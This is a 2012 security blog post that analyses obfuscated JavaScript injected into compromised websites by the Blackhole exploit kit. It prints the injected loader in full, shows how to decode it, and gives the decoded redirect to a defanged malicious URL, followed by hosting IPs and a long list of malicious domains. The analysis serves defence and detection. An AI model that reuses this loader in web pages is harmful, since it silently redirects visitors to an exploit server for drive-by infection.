Blog for hpHosts, and whatever else I feel like writing about ....

Tuesday 2 October 2012

Blackhole exploit: Compromised sites

Looking at a recent case of a compromised site, I noticed something rather surprising - they're not even bothering to try and make the code difficult to decode. I'm pondering of course, the thought that this is deliberate, due to the changes in v2.0 of the Blackhole exploit (others have already written about that [1] [2], so won't go into that here), but even if this is the case, the choice of using far less complex code on compromised sites, is puzzling to say the least.

In this case, the code inserted into the compromised site is (I've formatted it for readability)

v="v"+"a"+"l";
try
{
        faweb++
}
catch(btawetb)
{
        try
        {
                sbgesrb+325
        }
        catch(btawt4)
        {
                w=window;
                e=w["e"+v];
        }
}
if(1)
{
        f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
}
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
        j=i;
        if(e&&(031==0x19))s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
if(0x10==020)try
{
        gbrgbdf&236;
}
catch(asga)
{
e("if(1)"+s+"");}


To decode this, all you need to do, is modify it as follows;

v="v"+"a"+"l";
e=eval;
f=new Array(118,96,112,49,60,50,57,58,8,118,96,112,50,60,116,97,113,47,59,9,103,102,39,116,97,113,47,61,60,116,97,113,48,41,31,121,100,110,97,117,108,99,110,115,44,108,110,97,97,115,103,111,109,59,34,103,114,116,111,56,47,46,109,110,107,103,110,100,96,97,120,115,110,96,114,111,113,44,114,116,56,56,47,54,48,46,100,111,113,115,109,46,106,105,109,105,115,46,97,111,107,115,109,109,44,112,103,110,34,58,123);
w=f;
s=[];
r=String;
x="j%";
for(i=0;-i+111!=0;i+=1)
{
    j=i;
    s=s+r.fromCharCode((1*w[j]+e(x+3)));
}
e(s);


Which gives us (I've disabled the URL, to prevent those that have links auto-hyperlinked);

var1=49;
var2=var1;
if(var1==var2) {document.location="hxxp://onlinebayunator.ru:8080/forum/links/column.php";}


In this case, onlinebayunator.ru is residing at;

70.38.31.71 - AS32613 70.38.0.0/17 IWEB-AS - iWeb Technologies Inc.
202.3.245.13 - AS9471 202.3.245.0/24 MANA-PF-AP MANA S.A.
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network

Other domains known to have (most are now thankfully, dead) or are, living on the IPs include;

adventiste.pf
anapoli.ru
ashanrestaurant.ru
atp.presidence.pf
bmwforummsk.ru
croixrouge.presidence.pf
denegnashete.ru
diareuomop.ru
dimabilanch.ru
etatsgeneraux.pf
flumifrator2unix.ru
forumanarhist.ru
furnitura-forums.ru
gorysevera.ru
ioponeslal.ru
ipadvssonyx.ru
kefrikin.ru
kerneloffce.ru
kolmykiaonline.ru
leprisoruim.ru
limonadiksec.ru
mazdaontours.ru
minweb.presidence.pf
mirdymas.ru
moskow-carsharing.ru
moskowpulkavo.ru
mskoblastionline.ru
myren.net.my
mysqlfordummys.ru
offshoremskk.ru
omahabeachs.ru
onerussiaboard.ru
onlinebayunator.ru
online-cammunity.ru
online-gaminatore.ru
panalki.ru
panamamoskow.ru
penelopochka.ru
phpforkiddies.ru
porschedesignrussia.ru
porscheforumspb.ru
presid.pf
presidence.gov.pf
presidence.pf
psg.presidence.pf
pussyriotss.ru
refonte.presidence.pf
rumyniaonline.ru
sectantes-x.ru
sergikgorec.ru
soisokdomen.ru
sonatanamore.ru
spb-koalitia.ru
switched-games.ru
uzoshkins.ru
zenedin-zidane.ru


hpHosts, Malware Domain List, Malwarebytes AntiMalware users will be pleased to know, the IPs/domains are already blocked.

Incidentally, onlinebayunator.ru was resolving to following yesterday (1st October), and nope, I'm not surprised to see CB3ROB' IP space making an appearance either;

84.22.100.108 - mail.cyberbunker.com - AS34109 84.22.96.0/19 AS34109 CB3ROB Ltd. & Co. KG
190.10.14.196 - cb9.creationsbank.com - AS3790 190.10.0.0/17 RADIOGRAFICA COSTARRICENSE
203.80.16.81 - ns1.myren.net.my - AS24514 203.80.16.0/21 MYREN-MY Malaysian Research & Education Network

References

Malware Domain List - Malzilla
http://www.malwaredomainlist.com/forums/index.php?topic=218.0

Malzilla (open source)
http://malzilla.sourceforge.net

1 comment:

Enchufe said...

How could be infected my site by this exploit?